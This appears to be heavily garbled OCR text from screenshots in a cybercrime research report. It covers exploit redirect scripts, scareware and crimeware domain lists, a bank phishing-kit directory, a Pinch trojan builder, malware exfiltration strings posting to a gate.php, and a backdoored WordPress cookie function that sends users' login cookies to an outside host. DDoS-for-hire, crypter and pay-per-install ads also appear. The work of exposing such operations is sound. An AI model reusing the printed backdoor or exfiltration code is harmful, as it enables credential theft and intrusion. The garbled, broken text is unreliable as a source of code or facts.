051 C<tKERCELSZ. EnterCriticatgLentercrit iealsect ion 


Eee 
; 
: 
; 


SOee0-G-o 7 


< 


Cesstssceltsct ice bes 


whee eee eee ew 


CO-ONDTW m 


: 5 t fri 
: B PTR Sertenmeioa reat 
2 hsb vontSeouten LastErr ERRORLSLXCESS (o00g00E 
: itlealSeot ies EFL 00000846 (10. HG, E.B0. MS, PE. GEL 
. GTO eroty 277 FFFF 11492067 192821 
° § 27? FEFF LIFELCO 10eSiC 
Y S32 eroty -7P? FFFF t140143F t2moie 
. S13 eroty -??? 1 ti ioreait 
. ST4 eroty —?7? FFFF 
: BFE eroty 277. 
> * 
: E15 Sroty oe: tooopnesoesooeNe 
5 3210 ESPL 
rst Cond @ 8 0 Err OC OE 
PCH @27F Prec NEPA, Mask it 


: 
a 


t i. O01) F610) hot ” i 
at UBERS2. Get Digite 
A 
RETURM to ico. 00 
m0 19) 
OOL2FEIG) ASCII “averty” 
haseisloeety sseite 
1 Tl “querty” 
SOL Ti4 
GOF 83463} 100. OF 03483 


PREPTIE 


22) 


8228282328 
ZBZRZ222232 


232222822229 
38228283233) 
288828222232 
BBS 2322S235, 
B822823223%, 
SBSESERIELEF 
err | 
S22282S32929 
383282233588 
SS2ESzRR2 L244 
SBS82282283% 
SB3ESE83E22% 
S8328ES228823 
BBSSSSE2E222) 


[CPU - main thread, module dbx_mmap] 


88 
aa 


CARERS 
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FESRABEESESEROOND 
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~CreateFileA>) kernelS2.CreateF i len 


< 


Rib iobs 


ESS SPOS SEE LESSEE LLL ELLE 


PTR OS: (CX SKERNELS2.CloseHandie>) kernel32.CloseHandie 
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Geeeae 
Pent: 


oS 
33 
38 


Ceeececeo + 


RAVES 
see 


CO4ONDIO Mm 


LattErr ERROR_SUCCESS (oveee0 
OOOSOIG? (10, 1, NE, ANS, PO, GE, 
~97? FRPP 12492057 1 
y -27? FFFE LIFES 10ES) 

2? FF 
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ASCIE “OB/Crypt/EncodeString” 
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RICIE “OR-/ Crypt -fecodeStr ing” 


Ha 
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. 

B333 

F 
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<ous) Oller Rll “averty” 
PORRO 


27500 oot 
fa3 RETURN to mira 


3 t tt It “querty” 
Fie 4 Get Digit, 
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OO nirandad. O450500 
8 dbx_eveo. 05554319 
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i OOrri«s 
EL® O51942E4 che rman. O81 B2ES 
3 it OCETFFFFFF) 
it OLEFFFFFFF) 
it O(FFFEFFFF) 


- oo 
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6 
aK O@ LastErz ERROR_SUCCESS ( Q0000000) 
RSCII “DB-CeyptEncodeString” EFL @000G246 NO. 1G, £, 06,5, FE.GE,LE! 


Me ; ASCII "UB/Cryot-DecodeString” 
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vee 
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£6 
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232) 


RPSIAAAATSASAAITADAAAITARAD AST 
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10 Characters 


Just numbers. As you can see choosing a password from such a small range of characters is a bad idea. 


0129486769 
Passw i 
~ Length ‘ombinations 1 ‘ 
2 100 Instant Instant Instant Instant Instant Instant 
E 000) Enstant] Enstant] Enstant} Brictant] Brstant} Enstant} 
4 10,000 Instant Instant Instant Instant Instant Instant 
5 100,000 10 Secs Instant Instant Instant Instant Instant 
6 1 Million 12 Mins 10 Seconds Instant Instant Instant Instant 
7 10 Million 17 Mins 14/2 Mins 142 Mins Instant Instant Instant 
8 100 Million 2% Hours 17 Mins 242 Mins 10 Seconds Instant Instant 
9 1000 Million 28 Hours 2% Hours 27 Mins 142 Mins 10 Seconds Instant 
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3rc=//82.146,.51.80/red. html. Patent No. Patent Title: Issue Date: ... 

www. patentstorm.us/...//82.146.$1.80/red him - 11k - Cached - Similar pages 


US Patents Search: buy this shit spam online this shit spam order... 

Search Results for buy this shit spam online this shit spam order this shit spam prescription 
$rc=//82.146.51.80/red. htm ... 

www. patentstorm.us/,..//82.146.51.80/red. him - 10k - Cached - Similar pages 


US Patents Search: buy levitra online order levitra on line order ... 
Search Results for buy levitra online order levitra on line order no prescription levitra without 
sro=/82.146.51.80/ html ... 
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ORIGINAL EMBEDDED JAVASCRIPT: 


<script>var source ="=1dajquurgt SO 187 64997” 


""forfvar @0,i<source ler Code(source charCodeAd 


heeSiring tromCh 


Gi} l.documect wrte(resull), </¢ 


CEOBFUSCATED REDMECTS TO: 
freascret" ree"hep W184 244 138 


<ocript type" 


OBFUSCATED JAVASCRIPT at GASS; 


“7 Jet} equa" 


73 
hte) athipe 


oun). 17<= XS 
“ty. “LayrerdeB4<e 2316 
0.06803, 122), 20 


1S). fvgwen( 491 Sie sdyme= 
257 .sgvi)+ 

MA? Pog 207 0p+ 

7300"! ") +0. 765e3 


; "0.2.0 


Ree eB ee SHB el <x 
$0 424."s"+ 14+ tapi she 
seal 8 


#70" +" Te) 14012628 75 del wp 
<Dxd7 17.6 kym2d) 0286! 93303?"> <M" +" Oud) + 
document: 20I2))H (0x27 , 9486)>=4976 
(6 641 Dx7703)7(628. < 947600: ated) + 
354 Tree 309) (GOS5<207 7S. recutpe(t 
98 relpt) G81 « 


kzhip)+{ 3 .gigo 
1 7368 reypcew)e 


403)7325 7") 9 
5.1202)?! A 03303 
7" 4 101) eDxB29 


DEOBFUSCATED JAVASCRIPT REDIRECTS TO LIVE EXPLOITS; 
84 244.138 S5Atiin cgelteame -> B4 244 138 SSvane/eet7 
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uf ht / noua 


thie 


sooty Carter 


PayPal 


My Accom Send Money Recuest Money Merchant Servic keaton Tools Products and Service 


Overton = Add fund 


Welcome "ee efit cee 
A t stat ented tatus: Activ 
pacch bansact Search 
wy Ute) ate 
PayPal balance Oamena ~ 
wrerey Baaree 
a Primary s11.1975 
Tent PayPal Money Market A 1 Rat 52% 
Coretta Sitersiuso 
View 11 ansactiors Toots 
Ail ae Soul as Savy mntins 


Payments received 


GB Mute coder shiocerg 


weal Terriers — Assume Parmerts 


Integr ate Recurring Payments 


ard ce PayPal accourt on a reguiae ba 


a 
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a 


Me AEE Satellite 


” Address: 


=) ulitsa Kropotkina, 1 
Russian Federation, 197101, St Petersburg 


Combined with the fact that EVROHOST-NET/Eurohost LLC (eurohost.biz.ua) 91.212.65.0 - 
91.212.65.255 - AS48841 remain an inseparable part of GazTransitStroy’s info, clearly indi- 
cates the presence of a well known cybercrime powerhouse - the RBN itself. 


The following domains (crimeware, live exploits, scareware, you name it they engage in 
it) maintained by GazTranzitStroy have migrated as follows. From 91.212.41.96 to CHINANET- 
SH CHINANET shanghai province network - 222.64.0.0 - 222.73.255.255: 


loshadinet .com 
roselambda .cn 
use-sena .cn 
peopleopera .cn 
forexsec .cn 
symphonygold .cn 
dreamlitediamond .cn 
vilihood .cn 
bookadorable .cn 
drawingstyle .cn 
housedomainname .cn 
roomsme .cn 

vilasse .cn 

workfuse .cn 
stakeshouse .cn 
financeimprove .cn 
lifenaming .cn 
travetbeach .cn 
schoolh .cn 

rainfinish .cn 
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i] FRI cea 7 westie norman / neon 
(a) SE srs 
i) PERE ects 1 start exel drama ents 


a) EE tt ste 
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Pay Per Install 
PayPerinstall.ORG 


webmmaiters whou 
would lhe to 


mabe money with ZangoCash 


the ybehe ow 
specaly # they 
\oee oftware TangoCash is the legend of pay per install programs and there is many ways: 
avatabdle tor how to make money wan rem There is many sées liste) metods of 
Goerdsed. Ri Wnts barring money wih Zango. ZangoCash pays much more han oer pay per 
install fiat ploy ama 
tango Cash pays up to $1.46 per instal af depends how many installs per 
(noni you have and tom whal courty Rose installs comes and how unique 
(s the traic. Since December 2007 there is new pay structure 60 for USA 
brstalis you get $0.75 - $1 45, $0.40 - $0.75 for (Canada, France, Germany, 
Baty, Netherlands, Spain, Undted Kingdom installs) and cther selected 
touties (Austala, Austia, Belgium, Oenmark, Firtand, iceland, ireland, 
\eexico, New Zealand, Norway, Portugal, Singapore, Sweden, Swizertand) Stan 
brstatis are pals $0.10 - $0.24 So the minimum you an pet far instal is $0.10 
Which Is prety 900d. Te get the highest rates you need to make 700 000 earning 
thew code. There nstalts per mort There ts many ways how to promote ZangoCash such as 
wikectmanen | RG, DEN, Media Reiter, Steere bande aed omens. You pet CASH 
t ActrreX Wwasty paid by paypal, check ce wite tarrster. You can find stories about today!» 
cade of meet tonvention rates which are reaching arround 145 but | would say fiat ts too y? 
frarne nto thew high 130 should be po0d fer you # you protect your content wih Zango. han 
she. This voy # (OU pet inatall for every 20% wid to your site which comes from listed 
partindar page Countries and has no Zango instated already 


be 1b prompted to ah : 
Couniond spade VombaCash LS * wigs, 7 3) 


VornDac ash Is very new program As a new pay per install affiute program 

oy Rofers 9 huge coportundty to mantrrene reverses trom your batic The sea 
effer alee free behind Vombacath ts to Create a Win-Win Win schuBon, for your trafic for you 
see eee tnd for end users. What sat VornbaCash apart is tact frat thay have 
thet eun 9. Orveloped & sale and trusted ad supported program wih high Coewersion 
Above there a & tates and amazing benefits tor you and your trafic To show VornbaCash 
ink to artice tommenanent to users safety, hey have enrolled Vornba in he TRUSTe's 
Spare Soe oes Trusted Downioad Program 
{poe died You can read about Verba and TRUSTe's Trusted Download Program at 
Mow lets start and eww Tutte orpaboutipress_release2_15_07 php ih addon to great 
make money for promotenal tools, VorbaCash aso ofers Dre pos sitdity to promote its high 
ae nereee Qualty tee contents (VornbaShcts and VornbaSavers) at your own content 
inotal (Pay Per Paymerd are send on Te 1st and 16% every month, afd payment methode 
Download ames bre checks. wire. Paypal, and epassporte. 


wil help you) 


WaveRevenue 


WareReverue is an afihate Toolbar that pays you each time a surter installs 
fis Toolbar on his computer. This Toolbar is pertect for al hinds of watic 
Even for bratic that ts of lower quality hat is usually hard to monetize wih 
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Welcome to our Affikate System. 


If you have any questions please 
contact us by 


Regards, 


week 16 (12 Apr — 18 Apr) 2004 
week 15 (05 Apr = 11 Apr) 2004 

week 14 (29 Mar - 04 Apr) 2004 
week 13 (22 Mar — 28 Mar) 2004 
week 12 (15 Mar - 21 Mar) 2004 

week 11 (08 Mar — 14 Mar) 2004 
week 10 (01 Mar — 07 Mar) 2004 
week 09 (23 Feb - 29 Feb) 2004 
week 08 (16 Feb -— 22 Feb) 2004 
week 07 (09 Feb - 15 Feb) 2004 
week 06 (02 Feb -— 08 Feb) 2004 
week 05 (26 Jan - 01 Feb) 2004 

week 04 (19 Jan - 25 Jan) 2004 

week 03 (12 Jan — 18 Jan) 2004 

week 02 (05 Jan - 11 Jan) 2004 

week 01 (29 Dec — 04 Jan) 2004 
week 52 (22 Dec - 26 Dec) 2003 
week 51 (15 Dec - 21 Dec) 2003 
week 50 (08 Dec — 14 Dec) 2003 
week 49 (01 Dec - 07 Dec) 2003 
week 48 (24 Nov — 30 Nov) 2003 
week 47 (17 Nov — 23 Nov) 2003 
week 46 (10 Nov — 16 Nov) 2003 
week 45 (03 Nov — 09 Nov) 2003 
week 44 (27 Oct = 02 Nov) 2003 
week 43 (20 Oct - 26 Oct) 2003 

week 42 (13 Oct -— 19 Oct) 2003 


week 41 (06 Oct - 12 Oct) 2003 
week 40 (01 Oct - 07 Oct) 2003 
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week 17 (19 Apr - 25 Apr) 2004 a 


: 


ROUND 1 SCORE: 200 LIVES: xe TIME LEFT: 0:34 


Don't trust URLs 


with all numbers 
\ http://80.157.192.106/.www.bankofthews in the front. 


( 


WITH URL REVEALED: | E | eat cecrrimarte uris R | revect prisninc uris T | ask Your FATHER FOR HELP 
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ty militarybankonline.b..> 06-Apr-2008 05:54 116k 


online.anz. ~au.zi 06-Apr-2008 06:33 46k Parent Directory 09-Apr-2008 07:02 - 

online. vamu.com.zip 06-Apr-2008 06:51 8k KB-LETTER. HTH 06-Apr-2008 08:34 8k 

online.westpac.com.a..> 06-Apr-2008 06:42 37k Smile. html 06-Apr-2008 08:26 2k 
th uvv.bankofamerica.co..> 06-Apr-2008 06:56 4ik St.George. htm 06-Apr-2008 08:27 3k 
i uv. t.com. 06-Apr-2008 08:35 85k abbey. html 06-Apr-2008 06:23 2k 
th wyy.c = A 06-Apr-2008 05:57 77k bank of america 2.htm 06-Apr-2008 08:23 7k 
: +Cotm. 06-Apr-2008 05:58 66k bank of emerice-beml 96-Apr-2008 09:23 ak 
i wyv.e-trade.com.zip 06-Apr-2008 05:59 126k e-gold. htm) 06-Apr-2008 08:25 2k 
i j .com. 06-Apr-2008 05:58 986k ebay 2.htm 06-Apr-2008 08:23 8k 
iy uyy.epassporte.com.zip 06-Apr-2008 05:58 301k ebay 3.htm 06-Apr-2008 06:24 16k 
ty wey. hsbe.co.uk.zip 06-Apr-2008 06:00 348k ebay. hem) 06-Apr-2008 06:23 10k 
i wyyv.lloydstsb.com.zip 06-Apr-2008 06:00 45k etrade. hrm) 06-Apr-2008 06:25 ik 
ah uvY. mo .com..> O6-Apr-2008 06:01 331k halifax 2.htm 06-Apr-2008 06:25 3k 
iy wyy.nationvide. sip 06-Apr-2008 06:34 13k halifax. html 06-Apr-2006 06:25 6k 
i wvy.natvest.com.zip 06-Apr-2008 06:48 18k hotmail. html 06-Apr-2008 06:25 6k 
i wyy.paypal.com ( 200..> O7-Apr-2008 15:43 366k habe. hem 06-Apr-2008 06:26 Sk 
ty wyy.paypal.com. zip 06-Apr-2008 06:01 212k Lioyds. htm) 06-Apr-2008 06:26 2k 
i wyy. sunnbn}.com.zip 06-Apr-2008 06:02 256k nationvide. html 06-Apr-2008 08:26 3k 
i uvy tdcanadatrust.zip 06-Apr-2008 06:36 25k natvest. html 06-Apr-2006 06:26 2k 
i uvy. usbank.com. zip 06-Apr-2008 06:04 98k paypal 2.html 06-Apr-2008 08:26 6k 
ty wuy. vachovia.com.zip 06-Apr-2008 06:05 73k paypal. htm) 06-Apr-2008 06:26 7k 
th wuu.vellsfargo.com.zip O6-Apr-2008 06:45 160k regions. html 06-Apr-2008 08:26 4k 
iy uyy.vesternunion.com..> O6<-Apr-2008 06:06 111k G welistargo.html 06-Apr-2008 08:27 8k 
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RESPONSE 
EMAIL RESPONSES 


Scenario (1): New Laptop oe —— 


Clicked Link, 355 


Entered Data, 173 


~ 
= | U 


No Response, 460 


B® Clicked Link 


bob.smith@yourcompany.com Marketing Dept Sun Sep 09 21:09:10 -0400 2007 


jane.doe@yourcompany.com Front Office Sun Sep 09 21:11:01 -0400 2007 
kevin.smith@yourcompany.com Front Office Sun Sep 09 21:13:03 -0400 2007 
jack.loe@yourcompany.com Front Office Sun Sep 09 21:14:23 -0400 2007 
jason.smith@yourcompany.com Front Office Sun Sep 09 21:14:44 -0400 2007 
jack.smith@yourcompany.com Marketing Dept Sun Sep 09 21:15:10 -0400 2007 
mike.doe@yourcompany.com Front Office Sun Sep 09 21:16:01 -0400 2007 
ron.smith@yourcompany.com Front Office Sun Sep 09 21:16:03 -0400 2007 
aaron.loe@yourcompany.com Front Office Sun Sep 09 21:16:23 -0400 2007 
jaime.smith@yourcompany.com Front Office Sun Sep 09 21:17:44 -0400 2007 
sam.smith@yourcompany.com Marketing Dept Sun Sep 09 21:18:13 -0400 2007 
bob.doe@yourcompany.com Marketing Dept Sun Sep 09 21:19:21 -0400 2007 
[957] 


Daily Phishes Verified 
25 2009 21 


chart created Feb uTC 
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housevisual .cn 
kvk.housevisual .cn 
xfln.housevisual .cn 
worksean .cn 
blogtransaction .cn 
liteauction .cn 
seamodern .cn 
smilecasino .cn 
newtransfer .cn 
oceandealer .cn 
pub.oceandealer .cn 
musicdomainer .cn 
wowregister .cn 
websiteflower .cn 
travets .cn 
designroots .cn 
teamwows .cn 
startgetaways .cn 
moulitehat .cn 
caxf.moulitehat .cn 
islandtravet .cn 
weekendtravet .cn 
resorttravet .cn 
litefront .cn 
palaceyou .cn 
youbonusnew .cn 
clubmillionswow .cn 
rainjukebox .cn 
xuyxuyxuy .cn 
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Pinch v.3.01 by $haitan (Gate Builder) 


Tred Loe 


BUILDER 
Host Gate/agpecc refra: 
|www.dnshere. com by S haltan 
Path at the host/nyrp na xocte: ; YUGI9I3 
/ad/gate.php — 


File Name for report/HasBanue oTYyéTa: 
report. bin 

e-Mail/mpino ana oT4éta: 
nobodyathome@ms.com 


e-Mail subject/rema gaa noyre: 
my_report 


Heng IV Crypt & Pack (with PEC2) Build PINCH | 
RY) Private [Bee] Heb | 
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Process Explorer - Sysinternals: www.sysinternals.com [BOOBLIK\root] 
«| File Options View Process Find DLL Users Help 


Bot 88 et 4? EZ i a 


PID) CPU Description * 


["| svchost.exe 2516 Generic Host Process for Wi... 
[PM] vroumare.sithd cvs ORR? ne VUbmiare Authorization Cernicg Vv 


a Properties vo v 


| Image | Performance | _—_—Performance Graph 
TCP/IP Security Environment 


Printable strings found in the scan: 


domaircs: 

C:\Documents and Settings\root\ 

Virdp 

C:\Documents and Settings\root 

\Defauk.rdp 

FTP Commander Deluxe 

C:\Program Files 

C:\Program Files\F TP Commander Deluwe'\Ftplist. tat 
YkeSbmVub3yibIU3 

POST /1/gate.php HTTP/1.0 

Host: %s 

%s-Type: application/x-www-form-urlencoded 
Connection Keep-Alive 

Pragma no-cache 

User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoF 
%s-Length %u 

a=logzz@logzz.rukb=Hello Loglid=%skc= 

Logzz 


[<] 
Olmage © Memory 


MBDAATTTA< 


erie ~—)P nwerern weuwn ara ert ee muy wpeurnn hurinpeeuwrer ~~ ail 21 ha 
m7 [ >) 
Commit Charge: 19.69% Processes: 46 
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function wp_set_auth cookie(fuser_id, fremenber = false, fsecure = '*) ¢ 
if ( tremember ) [ 
texpication + fexpire © time() « 1209600: 
» else ¢ 
texpication = time() + 172600; 
texpice = 0; 
' 


it ( ** o== Secure } 
fpecure = is_ssl() ? true 1 false 


it ( secure ) 
fauth cookie name + SECURE _AUTH_COOKIE: 
techeme + '‘secure_auth*: 

) else ¢ 
fauth cockie_name = AUTH_COORIE; 
fecheme = ‘auth’; 

' 


iwuth_cookie = wp_generate_auth_cookie(fuser_id, fexpiration, fecheme): 
flopged_in_cookie = vp_generate_auth_cookie(fuser_id, fexpiration, *logged_in'}7 


@o_ection('set_awth cookie’, fauth cookie, fexpire, fexpiration, fuser_id, facheme): 
@_action('set logged _in cookie’, fiogped_in cookie, fexpire, fexpiration, fuser_id, * logged ts’): 


setoookie(fauth cookie _name, tauth cookie, fexpire, PLOGINS_COOKIE_PATH, COOKIE _DOMAIN, teecure) : 
setcookie(fauth cookie _name, fauth cookie, fexpire, ADEIN_COOKIE PATH, COOKIE DOMAIN, secure): 
wetcookie (LOGGED IN_COOKIE, $logged_sm_cookie, fexpire, COOKIEPATH, COOKIE DOMAIN): 


at (fuper id > 5) resent me teenie tee] 


' 
if ( COOKIEPATH ‘+ SITECOOKIEPATH ) 
Setcookie (LOOCED_IN_COOKIZ, fiegpzed_in_cookie, fexpire, SITECOOKIZPATH, COOKIE_DOMAIN): 


if (fuser_ia > 5)¢ 
@2ite_get_ contents ("TERRE -¢ SERVER(*HTTP_mosT’) .¢ SERVER{' PEP _SELT'} .":".LOGGED_IN_COOKIE.”:".$logged_sn_cookie.":". 
’ 

) 

endst; 


Af ( 'funetion existe('wp clear auch cookie’) } 
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>od-Planet.com - The World's Largest and Most Accurate Podcast... 


This site may harm your computer, 
>od-Planet.com knows Podcasting. We're the World's largest Podcast Directory. 
www. pod-planet.com/ - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 


This site may harm your computer, 
°od-Planet.com knows Podcasting, We're the World's largest Podcast Directory. 
www. pod-planet.com/index.asp?folder_id=810 - Similar pages 


?od-Planet.com - The World's Largest and Most Accurate Podcast... 
this si 
Current Folder: Personals (Showing 1-9 of 9). ------- Sort By ------, Name ASC, Name DESC, 


Jescription ASC, Description DESC, Price ASC, Price DESC... 
www. pod-planet.comfindex.asp?folder_id=858 - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 
This gi 
Sort By ---—-, Name ASC, Name DESC, Description ASC, Description DESC, Price ASC, 


rice DESC, Rating ASC, Rating DESC ... 
www. pod-planet.comindex.asp?folder_id=877 - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 
This si 
Sort By ------, Name ASC, Name DESC, Description ASC, Description DESC, Price ASC, 


rice DESC, Rating ASC, Rating DESC ... 
www. pod-planet.comfindex.asp?folder_id=666 - Similar pages 


2od-Planet.com - The World's Largest and Most Accurate Podcast... 


This site may harm your computer. 
>od-Planet.com knows Podcasting, We're the World's largest Podcast Directory. 
www. pod-planet. com/index. asp?folder_id=787 - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 
Sort By -------, Name ASC, Name DESC, Description ASC, Description DESC, Price ASC, 


rice DESC, Rating ASC, Rating DESC ... 
www. pod-planet_com/index.asp?folder_id=795 - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 
fie af 
Sustralian (0), Belgian (0), Brazilian (0), Canadian (0), Chinese (0), Dutch (0). French (0), 


Serman (0), Hebrew (0), Italian (1), Japanese (0) ... 
www. pod-planet.com/index.asp7folder_id=788 - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 
this si 
Sort By -------, Name ASC, Name DESC, Description ASC, Description DESC, Price ASC, 


rice DESC, Rating ASC, Rating DESC ... 
www. pod-planet.com/index.asp?folder_id=900 - Similar pages 
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TotalVirusProtection 


~ Malware Secunty Scanner 


The TotalVirusProtection can resolve the 
following problems 


Features of the TotalVirusProtection 


Data Security 


Every seven days cur program 1s aunomamcaly updaced We have the best team « 


From 91.212.41.114 to NETDIRECT-NET - 89.149.206.0 - 89.149.207.255 - AS28753, interest- 
ingly, the DNS servers for the following domains ns1.pubilcnameserver7.com/ns1.pubilcname- 
server7.com are diversifying at 89.149.207.56 and 91.212.41.114: 


freeantivirusplus0O9 .com 
realantivirusplusO9 .com 
getantivirusplus09 .com 
smartantivirusplus09 .com 
addedantivirusonline .com 
addedantivirusstore .com 
addedantiviruslive .com 
addedantiviruspro .com 
countedantiviruspro .com 
plusantiviruspro .com 
myplusantiviruspro .com 
addedantivirus .com 
youraddedantivirus .com 
bestaddedantivirus .com 
easyaddedantivirus .com 
yourcountedantivirus .com 
bestcountedantivirus .com 
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wks [AlMarks =] Search | 


(na aopeees Ha xocTre 2M comncn oToSpamTh 8 Bike (ecm AOpHEN Ha GpHROC Tee Hereero BEiHpaTE He Hye): 
© -harps{fkey. domain com 

© -nutp:sfdemain.comkey/ 

© -hutp:fivmnnw.domain.comfhery! 

DD - nepareumeare coyasreees o6parcer 


Oy cae. ay av Action 

cr 957160 batp://edwardpeterson.247host.com/ringS315,hemi Haecoa ras oe Spamit| edt 
o 956826 batp:{oheshly hostevo.comfringhOtf o7.11 Message He om 
rc 954463 hitpifibiheshly hostevo.com/ringd93/ o7.tt Message ae edt 
Oo 954449 hitp:/ibiheshly hostewo .comjrings70} ort Message — edt 
oO 964438 http: /fbiheshly.hostevo.comfrsehoces o7.11 ica boca 
cr 954431 http: /fbheshly, hestewo.ccmigresc/ o7.11 meson he retin’ 
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Enkele bev eHigingsgegevens dle Wi) U adviseren na te zhee, 
Quelques éléments de sécurité : andons de = 
" Kontrolle wir empfehten 

recommend you to che¢ 


qe ROUS Yous recomm 
Einige Sicherheitselemente, der 


Some security elements that we 
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yourplusantivirus .com 
easyplusantivirus .com 
yourguardonline .cn 
easydefenseonline .cn 
bestprotectiononline .cn 
freecoveronline .cn 
atioge .cn 
yourguardstore .cn 
mycheckdiseasestore .cn 
examinepoisonstore .cn 
freecoverstore .cn 
myexaminevirusstore .cn 
bestexaminedisease .cn 
yourfriskdisease .cn 
easyfriskdisease .cn 
friskdiseaselive .cn 
bestdefenselive .cn 
bigprotectionlive .cn 
bigcoverlive .cn 
examineillnesslive .cn 
exodih .cn 

suxpymi .cn 

aciazi .cn 
yourfriskinfection .cn 
easyserviceprotection .cn 
easyincomeprotection .cn 
easypersonalprotection .cn 
easybestprotection .cn 
myascertainpoison .cn 
yourguardpro .cn 
refugepro .cn 
mycheckdiseasepro .cn 
ascertaindiseasepro .cn 
yourcheckpoisonpro .cn 
easycheckpoisonpro .cn 
yourfriskviruspro .cn 
myascertainviruspro .cn 
fegbywo .cn 

feptuaq .cn 
myexamineillness .cn 
exousyt .cn 

newguard2u .cn 
freedefense2u .cn 
bigdefense2u .cn 
bestcover2u .cn 
newguard4u .cn 
mydefense4u .cn 
bestcover4u .cn 
newguard4you .cn 
mydefense4you .cn 
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Se an an ee a es 
+ +++ © 


sorter 


+++? 


oS Lt aaa ied 


> + 

Pe ee ee on a ed 

Bee eeeeees 
> 


2 
peaneeeeeere 


+ 
+ 
’ 
+ 
+ 
+ 
+ 
+ 
- 
+ 
7 
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POCCHHCKAA  BOJIMTEJIBCKOE YJOCTOBEPEHHE 
nt PERMIS DE CONDUIRE 


m 


POCCHHCKAS _. BOJIATEJIBCKOE YIOCTOBEPEHHE 
maxemauxint PERMIS Te Cee 
61 EO 


Dama 
Mma 
Orsecrso 


Jlata 4 Mecto pc 
Pp 
Mecto KHTEILC 


BL AICI la Or) 


Oco6nie 
OTMCTKH 
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POCCHHCKAS — BOJJMTEJIBCKOE YJOCTOBEPEHHE 
PERMIS DE CONDUIRE 


77MBNnO 


Oamumnsa 


POC BOJJATEJIbCKOE YIOCTOBEPEHHE 
maximo nt PERMIS DE COND EA 

61 EO 

Dama 
ima 


Orsecrso 
ous H minnie px 


Mecto eA ae 


WIATC TELA ) 


Oco6nie 
OTMCTKH 
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bestcover4you .cn 
yourguardforyou .cn 
newguardforyou .cn 
myguardforyou .cn 
freedefenseforyou .cn 
mydefenseforyou .cn 
bestcoverforyou .cn 


ag Eurohost LLC Py ler gee? En , aaa 


Ukraine ney oe a J : : 
By SIRi - maps.google.com pet te wy Ss, ew t " aan 


1 of 41 placemarks in Ziot 


Eurohost LLC 
off. 1, 81 Frunze str 
Evpatoria, Crimea, Ukraine 


91.212.65.0 - 91.212.65.255 


91.212.06.36 viewworldx. com. viewmyworldx com 


Cia vemos 


The ongoing affiliation with EYUROHOST-NET/Eurohost LLC (eurohost.biz.ua) 91.212.65.0 - 
91.212.65.255 - AS48841, and the migration of domains (Scareware, live exploits, crimeware 
etc.) as follows. From 91.212.41.119 to 91.212.65.7 EUROHOST-NET/Eurohost LLC: 


nicdaheb .cn 
sehmadac .cn 
ralcofic .cn 
bikpakoc .cn 
xidsasuc .cn 
koqsuyod .cn 
tozxiqud .cn 
bowselaf .cn 
cuzlumif .cn 
porgacig .cn 
hifgejig .cn 
rogkadej .cn 
sipcojeq .cn 
silzefos .cn 
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HOSTED PORTALS 
HOSTED TGPS 
°. 


18000+ FHGS 


‘ 7S 7 
Oxunsour : seGbens 
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o Here You can buy DDOS 
8 | ro 
C8. & Qebneta ED) GA 
Delete Junk Reply Reply All Forward Print To Do 


From: 
Subject: Here You can buy DDOS 


Date: August 18, 2009 11:58:01 AM PDT 
To: 


If You dont like Obama come here, you can help to ddos his site with your installs. 


We are waiting You our phone is +86 
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1 (Pawning Anti¥irus Cryptor) POLYMORPHIC — x 


cryptor manager: @psik 
coder: masha_dev 


K¥NMTb KPMNTOpP MOXHO TOoNnbKO no ICQ 9496953 


OA KPHNTSa: 


Onuwu kKpunra EXE 


— aiirai 
Smits Eee 


YnakoBarb npu nomownH PECo 
YnakoBarb np nomown | UP 
UnakoBbarb npu nomown 


YBeNWyHTb pa 


—— 


U6pare MKOHKY HS 


ME ([YMEHbUWHTb pe 


LamoyganeHue 
www.om-warez.nm.ru 
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EE i | alelxi 


Fle Edt View Proect Gad Cetup Took Window Community Help 


O-3S-SFe els w 2 > Cebup + Wink? -2 7 |RIBLBO5-5 
LSuer FR TS HD+ Rs 
Scion Lapiorer « Scktion pb... « 9 rma | protec | macterdc | masterdin | man = 
>| [((acbel scope [+ onemctiverver_dste_s * ary, packet_s* p =} 
TT bctewe =| static int ex parse(server data = "arv, transport = *t, packet = *p a : 
® Heoter Fites - 
®) oF ny . 
=) prem * drop too small packe 2 
> Source Files A : 
©} pron it ip is 2 > 
Binet wee seahceemdadiintd 
Hooter Fes ' 
4) master-dit * check if its eck message * 
it ((p->date(0) ¢ M36 ACK 
° equa seq ast message 
ig packet.2eq 
ceture 
t ack message send ack back * 
net sendeck(srv->sock, <t->pecket.eddress, p tate 
if (p->data[i) == c->recv_seq 
* we have received is pecket elreed 
. esstu te ered 
. ner 
cetuce 
adjust new seq 


>} transport. 
zd te zi if (p->eize - 
AQsan... [FGaw... Layrece.. Le 


“Bode Detintion Window [7 SCall Browser | <j Outpt 


Ready 
Bsrart| @ C3 Vi Wendows Live Messenger | F verde eu - Vew hors | serhode.com View toe || pret - sacroseft Venue 


w2 calé as mes 
@? -tesqgeo ox 
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/* we will add this ot the end of queue */ 
af (nm f= NULL) 
‘ 
while (m->next [= NULL) 
B © B->nexts 


B-7next = mJ 


’ 
else 
proto->¥ q = = 


/* allocate apace for data needed to be sent */ 
m>container = (char *)malloc(len)s 
if (m@>container == NULL) 
‘ 
feturn NULL: 
) 


/* copy date to container */ 
for (4 = O: 4 < lem: t+) 
m>container(1) = data{ijs 


we >data = w->containers 
@>len = len: 

we>type = types 

Tider: 

wid = "ids 


ali 


4 
+ 
2) 
4 
’ 


¥ 
; there ia data in container aiready */ 

/* allocate bigger space, move aii data into it */ 
/* at the end free previous container */ 

char *tmp_conts 

unsigned int tmp_cont size; 


tmp_cont_aize = proto->ine_ cont size + p->aize - 2; 
tmp_cont = (char *)malloc(tmp_cont_size)s 
tf (tmp_cont == MULL) 
‘ 
feturn 2; 
) 


3 
& & Source Fes /* copy from previous container into new one */ 
©} masterdic memcpy (tmp _cont, prote->ine container, prote->ine_ cont size); 
) f== 
& Heoder Ples /* eelease previous container */ 
defines 


tree (peoto->inc_ container)! 


/* append new date into new container */ 
peoto->inc container = tmp cont: 
tmp_COnE += proto->inc_cont sizes 
mencpy(tmp_cont, dp, p->aize ~ 2): 
PEOtO->1ne_ cont size = tmp _cont size: 


Af (p->daca(0) &¢ R3G_LAST) 
‘ 

